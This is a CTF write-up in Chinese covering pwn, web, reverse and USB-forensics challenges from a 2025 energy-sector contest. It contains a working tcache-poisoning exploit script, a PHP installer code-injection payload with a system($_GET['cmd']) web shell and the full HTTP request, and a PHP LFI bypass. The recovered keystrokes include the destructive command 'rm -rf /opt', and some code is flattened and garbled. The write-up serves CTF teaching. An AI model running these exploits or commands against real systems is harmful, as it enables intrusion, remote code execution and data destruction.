pwn
pwn_milk
UAF的堆题目,只能编辑和释放前五个堆块,没有show函数可以leak,且没给libc版本。
注意到题目没开 PIE(程序地址固定),而且 GOT 表可写(应为 Partial RELRO),所以可以用 UAF 做 tcache 投毒,得到任意地址读写:把保存堆块指针的全局数组(list_addr)申请下来,在前五个槽位里写入 free@GOT 和其他 GOT 项的地址,再把 free@GOT 改成题目自带的输出函数,这样 free 某个"指向 GOT 项"的槽位就等价于把对应 libc 函数的地址打印出来。用泄露的 alarm/atol 地址查到 libc 为 2.31(注意 2.32 起 tcache 引入 safe-linking,直接往 fd 写明文指针就不行了),最后往 free@GOT 写 one_gadget 并再 free 一次触发:
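from pwn import *

# Remote target. The original script also opened a local process("./pwn")
# first and immediately overwrote the handle; that dead connection is dropped.
p = remote("47.111.113.2", 22860)


def add(size):
    """Menu option 1: allocate a chunk of `size` bytes."""
    p.sendlineafter(b">> ", b"1")
    p.sendlineafter(b"Size: ", str(size).encode())


def edit(idx, content):
    """Menu option 2: write `content` into chunk `idx`.

    Works on already-freed chunks as well — this is the UAF the exploit relies on.
    """
    p.sendlineafter(b">> ", b"2")
    p.sendlineafter(b"Idx:", str(idx).encode())
    p.sendlineafter(b"Content: ", content)


def free(idx):
    """Menu option 3: free chunk `idx`."""
    p.sendlineafter(b">> ", b"3")
    p.sendlineafter(b"Idx:", str(idx).encode())


def leak_ptr():
    """Read the pointer echoed by the hijacked free() and return it as an int.

    Assumes the leaked bytes are immediately followed by the menu text "1."
    (hence the [:-2]); the raw bytes are zero-padded to 8 before unpacking.
    """
    raw = p.recvuntil(b'1.')[:-2]
    return u64(raw.ljust(8, b'\x00'))


# Fixed addresses: the binary is not PIE and its GOT is writable.
print_func = 0x4012B1          # program's own output routine, reused as the leak primitive
free_got = 0x0000004034e0
malloc_got = 0x000000403518    # unused, kept for reference
alarm_got = 0x000000403508
atol_got = 0x000000403528
list_addr = 0x403580           # global array of chunk pointers (only slots 0..4 are editable/freeable)
# context.log_level = 'debug'

# tcache poisoning: free two same-size chunks, then use the UAF to point the
# fd of the bin head at the chunk-pointer array.
add(0x38)
add(0x38)
free(1)
free(0)
edit(0, p64(list_addr))        # chunk 0 is at the head of the 0x40 tcache bin; its fd -> list_addr
add(0x38)                      # first allocation returns chunk 0 again
add(0x38)                      # second allocation returns list_addr itself

# NOTE(review): this assumes add() reuses the lowest free slot, so that after
# the two allocations index 1 refers to the chunk overlapping list_addr —
# that is what the edit(1) below relies on. Confirm against the binary.
# Pointer table now: [0] = free@GOT, [1] = alarm@GOT, [2] = atol@GOT, [3] = list itself
edit(1, p64(free_got) + p64(alarm_got) + p64(atol_got) + p64(list_addr))
edit(0, p64(print_func))       # free@GOT -> print routine

# free(1) now calls print_func(alarm@GOT): the GOT entry's contents (alarm's
# libc address) are printed. Same trick for atol via slot 2.
free(1)
alarm_addr = leak_ptr()
success(f"alarm: {hex(alarm_addr)}")
free(2)
atol_addr = leak_ptr()
success(f"atol: {hex(atol_addr)}")

libc = alarm_addr - 0x0e2d90   # alarm offset in the identified glibc 2.31 build
success(f"libc: {hex(libc)}")
one_gadget = libc + 0xe3b01    # one_gadget offset for that same build
edit(0, p64(one_gadget))       # free@GOT -> one_gadget
free(0)                        # any free() now jumps to the gadget
p.interactive()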
web
EasyInstall
thinkphp框架,打开是一个安装,审计安装代码发现如下函数:
/**
 * Write the installer's database configuration file.
 *
 * @param array  $config name => value pairs from the install form; each one is
 *                       substituted for the matching [NAME] placeholder in Data/db.tpl
 * @param string $auth   value substituted for the [AUTH_KEY] placeholder
 * @return string        HTML fallback when IS_WRITE is false, otherwise ''
 *
 * NOTE(review): every $value is str_replace()'d into the template without any
 * escaping, and in that template each placeholder sits inside a single-quoted
 * PHP string literal. A value containing a quote therefore breaks out of the
 * literal, and the result is saved as an executable .php file — this is the
 * code-injection sink exploited below.
 */
function write_config($config, $auth)
{
    if (is_array($config)) {
        // read the template
        $conf = file_get_contents(MODULE_PATH . 'Data/db.tpl');
        // replace placeholders — untrusted $value goes in verbatim, no quoting
        foreach ($config as $name => $value) {
            $conf = str_replace("[{$name}]", $value, $conf);
        }
        $conf = str_replace('[AUTH_KEY]', $auth, $conf);
        // write the application config file
        if (!IS_WRITE) {
            return '由于您的环境不可写,请复制下面的配置文件内容覆盖到相关的配置文件,然后再登录后台。<p>' . realpath('') . './Modules/Common/Conf/db.php</p> <textarea name="" style="width:650px;height:185px">' . $conf . '</textarea>';
        } else {
            // output path is derived from the client IP, and show_msg() below
            // echoes it back — so whoever submitted the form knows exactly
            // where the file they just wrote lives
            $filename = './Modules/Common/Conf/'.md5($_SERVER["REMOTE_ADDR"]).'.php';
            if (file_put_contents($filename, $conf)) {
                // NOTE(review): 0777 leaves a file holding DB credentials world-writable
                chmod($filename, 0777);
                show_msg("配置文件 $filename 写入成功");
            } else {
                show_msg('配置文件写入失败!', 'error');
                session('error', true);
            }
            return '';
        }
    }
}
会按下面的模板写出一个 .php 配置文件:模板里每个占位符都位于单引号字符串内,而 $config 的值直接来自安装表单且没有任何转义,所以文件内容可控:
<?phpreturnarray('DB_TYPE' => '[DB_TYPE]', // 数据库类型'DB_HOST' => '[DB_HOST]', // 服务器地址'DB_NAME' => '[DB_NAME]', // 数据库名'DB_USER' => '[DB_USER]', // 用户名'DB_PWD' => '[DB_PWD]', // 密码'DB_PORT' => '[DB_PORT]', // 端口'DB_PREFIX' => '[DB_PREFIX]', // 数据库表前缀);?>
尝试注入到数据库表前缀 DB_PREFIX:开头的 ' 闭合模板中 'DB_PREFIX' => '[DB_PREFIX]' 的字符串,紧接着的 ,'DB_TYPE'=>system($_GET["cmd"]),); 把一个 system() 调用写进 return 的数组里,末尾的 ?> 提前结束 PHP 代码,使模板剩余的部分变成普通输出而不会触发语法错误。构造的 payload 为 ','DB_TYPE'=>system($_GET["cmd"]),);?> ,请求如下:
POST /install.php?s=/Install/step2.html HTTP/1.1Host: 121.43.235.216:28139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=bfdf95b17528cbbde374a47d2a6a2d1c; foo_db_config=think%3A%7B%22DB_PREFIX%22%3A%22%2527%252C%2529%253Bsystem%2528%2524_GET%255B%2522a%2522%255D%2529%253B%253F%253E%22%2C%22DB_PORT%22%3A%223306%22%2C%22DB_PWD%22%3A%221%22%2C%22DB_USER%22%3A%221%22%2C%22DB_NAME%22%3A%221%22%2C%22DB_HOST%22%3A%22127.0.0.1%22%2C%22DB_TYPE%22%3A%22mysqli%22%7DContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1Referer: http://121.43.235.216:28139/install.php?s=/install/step2.htmlCache-Control: max-age=0Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Origin: http://121.43.235.216:28139Content-Length: 242db%5B%5D=mysqli&db%5B%5D=127.0.0.1&db%5B%5D=1&db%5B%5D=1&db%5B%5D=1&db%5B%5D=3306&db%5B%5D=+%27%2C%27DB_TYPE%27%3D%3Esystem%28%24_GET%5B%22cmd%22%5D%29%2C%29%3B%3F%3E&admin%5B%5D=admin&admin%5B%5D=1&admin%5B%5D=1&admin%5B%5D=admin%40admin.com
访问后执行命令,找到suid程序/readflag:
这网页怪怪的
审计代码:
<?php
include("flaaaaaaag.php");
highlight_file(__FILE__);
$tmp1 = $_POST['tmp1'];
$tmp2 = $_GET['tmp2'];
$secret = 289114;
// is_numeric() rejects a plain number, yet the next branch wants loose
// equality with an int. How a non-numeric string compares to 289114 depends
// on the PHP version (PHP < 8 converts a leading-numeric string such as
// "289114abc"; PHP 8 compares the int as a string instead), so the bypass
// is version-specific — NOTE(review): confirm the target's PHP version.
if (is_numeric($tmp1)) {
    exit('Too early');
} else {
    if ($tmp1 == $secret) {
        // include() of an attacker-controlled GET parameter: local file
        // inclusion (e.g. a php://filter wrapper to read flaaaaaaag.php).
        include($tmp2);
    } else {
        echo('you are close');
    }
}
// (rendered page output after highlight_file(): "you are close")
re
lava
linux64 程序带 UPX 壳,脱壳/手动调试后从栈上的常量里提取出 key("rc4IsEasy",9 字节)和 32 字节密文,然后对照反编译结果写出解密代码:
/*
 * Decompiled flag check. The stack is seeded with the 9-byte key "rc4IsEasy"
 * (a3[0] plus the low byte of a3[1]) immediately followed by 32 bytes that
 * the write-up treats as the expected ciphertext (the remaining bytes of
 * a3[1], then the n... and v... locals; the negative values are the same
 * bytes printed as signed chars). Up to 32 chars of input are read, run
 * through the RC4-variant in place, then checked.
 */
__int64 sub_4020AC()
{
    v29 = __readfsqword(0x28u);                  // stack-protector canary
    a3[0] = 0x7361457349346372LL;                // "rc4IsEas" (little-endian)
    a3[1] = 0xE9B979D03A640079LL;                // "y", NUL, then 64 3a d0 79 b9 e9
    n117 = 117;                                  // 0x75 — ciphertext continues
    n82 = 82;
    n110 = 110;
    v5 = -23;                                    // 0xe9
    v6 = -5;                                     // 0xfb
    n14 = 14;
    n82_1 = 82;
    n36 = 36;
    n28 = 28;
    v11 = -74;                                   // 0xb6
    n43 = 43;
    v13 = -28;                                   // 0xe4
    v14 = -122;                                  // 0x86
    v15 = -8;                                    // 0xf8
    n105 = 105;
    n82_2 = 82;
    n83 = 83;
    n62 = 62;
    n60 = 60;
    v21 = -114;                                  // 0x8e
    v22 = -80;                                   // 0xb0
    n22 = 22;
    n98 = 98;
    v25 = -26;                                   // 0xe6
    v26 = -104;                                  // 0x98
    n127 = 127;                                  // 0x7f — last ciphertext byte
    memset(a1, 0, 32);
    sub_419DC0(aPlsInputTheFla);                 // "Pls input the flag"
    sub_410F40(
        (__int64)"%32s",                         // "%32s"
        (const char *)a1);
    sub_401EE3((char *)a1, 0x20uLL, (__int64)a3, 9LL);   // transform 32 input bytes in place, 9-byte key at a3
    if ( (unsigned int)sub_4010E0() )            // presumably compares a1 with the stored bytes — body not shown
    {
        sub_419DC0(aError);                      // "ERROR"
        result = 0LL;
    }
    else
    {
        sub_419DC0(aGreat);                      // "GREAT"
        result = 1LL;
    }
    if ( __readfsqword(0x28u) != v29 )
        sub_4549B0();                            // canary mismatch handler (presumably __stack_chk_fail)
    return result;
}

/*
 * PRGA + "encrypt by subtraction": standard RC4 keystream generation over the
 * state built by sub_401CF5, but each byte has the keystream byte SUBTRACTED
 * (a1[i] -= K) rather than XORed, so the inverse is a1[i] += K.
 *   a1   : buffer transformed in place
 *   i_1  : number of bytes to process (0x20 from the caller)
 *   a3   : key pointer; n9LL: key length
 */
unsigned __int64 __fastcall sub_401EE3(char *a1, unsigned __int64 i_1, __int64 a3, __int64 n9LL)
{
    unsigned __int64 result;        // rax
    char v5;                        // [rsp+2Bh] [rbp-125h]
    int v6;                         // [rsp+2Ch] [rbp-124h]
    int v7;                         // [rsp+30h] [rbp-120h]
    unsigned __int64 i;             // [rsp+38h] [rbp-118h]
    char v9[264];                   // [rsp+40h] [rbp-110h] BYREF
    unsigned __int64 v10;           // [rsp+148h] [rbp-8h]

    v10 = __readfsqword(0x28u);
    sub_401CF5(v9, a3, n9LL);                    // key schedule -> v9[0..255]
    v6 = 0;
    v7 = 0;
    for ( i = 0LL; i < i_1; ++i )
    {
        v6 = (v6 + 1) % 256;
        v7 = (v7 + (unsigned __int8)v9[v6]) % 256;
        v5 = v9[v6];                             // swap S[i], S[j] — plain RC4 here
        v9[v6] = v9[v7];
        v9[v7] = v5;
        a1[i] -= v9[(unsigned __int8)(v9[v6] + v9[v7])];   // subtract, not xor
    }
    result = __readfsqword(0x28u) ^ v10;
    if ( result )
        sub_4549B0();
    return result;
}

/*
 * Key-schedule (KSA) variant. j advances exactly as in RC4
 * (j = (j + key[i % keylen] + S[i]) % 256) but there is no swap: instead
 * S[i] += S[j] and then S[j] += old S[i] (both wrapping at 8 bits), so the
 * resulting state is in general not a permutation. a1 receives the 256-byte
 * state; a2 / n9LL are the key pointer and length.
 */
unsigned __int64 __fastcall sub_401CF5(char *a1, __int64 a2, unsigned __int64 n9LL)
{
    unsigned __int64 result;        // rax
    char v4;                        // [rsp+27h] [rbp-119h]
    int i;                          // [rsp+28h] [rbp-118h]
    int j;                          // [rsp+28h] [rbp-118h]
    int v7;                         // [rsp+2Ch] [rbp-114h]
    char buf[256];                  // [rsp+30h] [rbp-110h] BYREF
    unsigned __int64 v9;            // [rsp+138h] [rbp-8h]

    v9 = __readfsqword(0x28u);
    v7 = 0;
    memset(buf, 0, sizeof(buf));
    for ( i = 0; i <= 255; ++i )
    {
        a1[i] = i;                               // identity state
        buf[i] = *(_BYTE *)(i % n9LL + a2);      // key repeated to fill 256 bytes
    }
    for ( j = 0; j <= 255; ++j )
    {
        v7 = (buf[j] + v7 + (unsigned __int8)a1[j]) % 256;
        v4 = a1[j];
        a1[j] = v4 + a1[v7];                     // add instead of swap
        a1[v7] += v4;
    }
    result = __readfsqword(0x28u) ^ v9;
    if ( result )
        sub_4549B0();
    return result;
}
defksa_variant(key: bytes) -> bytearray:"""Key scheduling algorithm (KSA) variant based on the C code provided.""" S = bytearray(range(256)) buf = bytearray((key[i % len(key)] for i inrange(256))) v7 = 0for j inrange(256): v7 = (buf[j] + v7 + S[j]) % 256 temp = S[j] S[j] = (temp + S[v7]) % 256 S[v7] = (S[v7] + temp) % 256return Sdefrc4_variant_decrypt(ciphertext: bytes, key: bytes) -> bytes:"""Decrypt using the variant RC4 algorithm from C code.""" S = ksa_variant(key) v6 = 0 v7 = 0 plaintext = bytearray(len(ciphertext))for i inrange(len(ciphertext)): v6 = (v6 + 1) % 256 v7 = (v7 + S[v6]) % 256# swap S[v6], S[v7] = S[v7], S[v6] k = S[(S[v6] + S[v7]) % 256]# 解密:还原 a1[i] += k plaintext[i] = (ciphertext[i] + k) % 256returnbytes(plaintext)# 示例:使用示例密文和密钥进行还原if __name__ == "__main__": key = b"rc4IsEasy" ciphertext = bytes([0x64, 0x3a, 0xd0, 0x79, 0xb9, 0xe9, 0x75, 0x52, 0x6E, 0xE9, 0xFB, 0x0E, 0x52, 0x24, 0x1C, 0xB6, 0x2B, 0xE4, 0x86, 0xF8, 0x69, 0x52, 0x53, 0x3E, 0x3C, 0x8E, 0xB0, 0x16, 0x62, 0xE6, 0x98, 0x7F])# 解密 plaintext = rc4_variant_decrypt(ciphertext, key)print("Decrypted:", plaintext.decode(errors='replace'))
加上flag提交:flag{2404c9b8af2dd18f92dd9018c85f76fe}
能源行业
usb
提取键盘流量,对照字典提取出命令是whoami && rm -rf /opt
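# USB HID keyboard usage IDs (hex string) -> character produced.
# normalKeys is used when no Shift modifier is set, shiftKeys otherwise.
# The pasted listing had lost its backslashes, which made "2b" (Tab) map to
# the letter "t" and left "31" / shifted "33" as unterminated string
# literals; those entries are restored as "\t", "\\" and '"'.
normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f",
    "0a": "g", "0b": "h", "0c": "i", "0d": "j", "0e": "k", "0f": "l",
    "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
    "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x",
    "1c": "y", "1d": "z",
    "1e": "1", "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6",
    "24": "7", "25": "8", "26": "9", "27": "0",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",  # 0x2b is Tab
    "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]",
    "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>",
    "36": ",", "37": ".", "38": "/", "39": "<CAP>",
    "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>",
    "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>",
}

shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F",
    "0a": "G", "0b": "H", "0c": "I", "0d": "J", "0e": "K", "0f": "L",
    "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
    "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X",
    "1c": "Y", "1d": "Z",
    "1e": "!", "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^",
    "24": "&", "25": "*", "26": "(", "27": ")",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",  # Tab is unaffected by Shift
    "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{", "30": "}",
    "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>",
    "36": "<", "37": ">", "38": "?", "39": "<CAP>",
    "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>",
    "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>",
}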
原文始发于微信公众号(BeFun安全实验室):2025年能源网络安全大赛社会组部分wp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。